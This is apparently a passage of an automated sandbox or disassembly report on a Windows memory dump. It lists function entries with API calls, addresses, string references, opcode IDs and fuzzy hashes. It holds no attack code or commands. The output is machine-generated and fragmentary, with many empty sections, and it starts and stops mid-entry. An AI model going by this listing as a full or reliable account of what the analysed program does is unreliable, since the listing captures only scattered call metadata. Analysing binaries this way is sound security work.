                                                                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                                                                • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                • memset.MSVCRT ref: 004139B8
                                                                                                                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                • memset.MSVCRT ref: 00413A00
                                                                                                                                                                • memcpy.MSVCRT ref: 00413A1B
                                                                                                                                                                • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                • String ID: \systemroot
                                                                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                                                                • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wcscpy
                                                                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                • API String ID: 1284135714-318151290
                                                                                                                                                                • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                • API String ID: 4066108131-3849865405
                                                                                                                                                                • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004082EF
                                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                • memset.MSVCRT ref: 00408362
                                                                                                                                                                • memset.MSVCRT ref: 00408377
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$ByteCharMultiWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 290601579-0
                                                                                                                                                                • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memchrmemset
                                                                                                                                                                • String ID: PD$PD
                                                                                                                                                                • API String ID: 1581201632-2312785699
                                                                                                                                                                • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2163313125-0
                                                                                                                                                                • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$wcslen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 239872665-3916222277
                                                                                                                                                                • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                • String ID: %s (%s)$YV@
                                                                                                                                                                • API String ID: 3979103747-598926743
                                                                                                                                                                • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                • API String ID: 2767993716-572158859
                                                                                                                                                                • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                                                                • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • out of memory, xrefs: 0042F865
                                                                                                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                • database is already attached, xrefs: 0042F721
                                                                                                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                                                                • Opcode ID: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                • Opcode Fuzzy Hash: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                • memcpy.MSVCRT ref: 0040EB80
                                                                                                                                                                • memcpy.MSVCRT ref: 0040EB94
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                • String ID: ($d
                                                                                                                                                                • API String ID: 1140211610-1915259565
                                                                                                                                                                • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3015003838-0
                                                                                                                                                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00407E44
                                                                                                                                                                • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 59245283-0
                                                                                                                                                                • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3467550082-0
                                                                                                                                                                • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
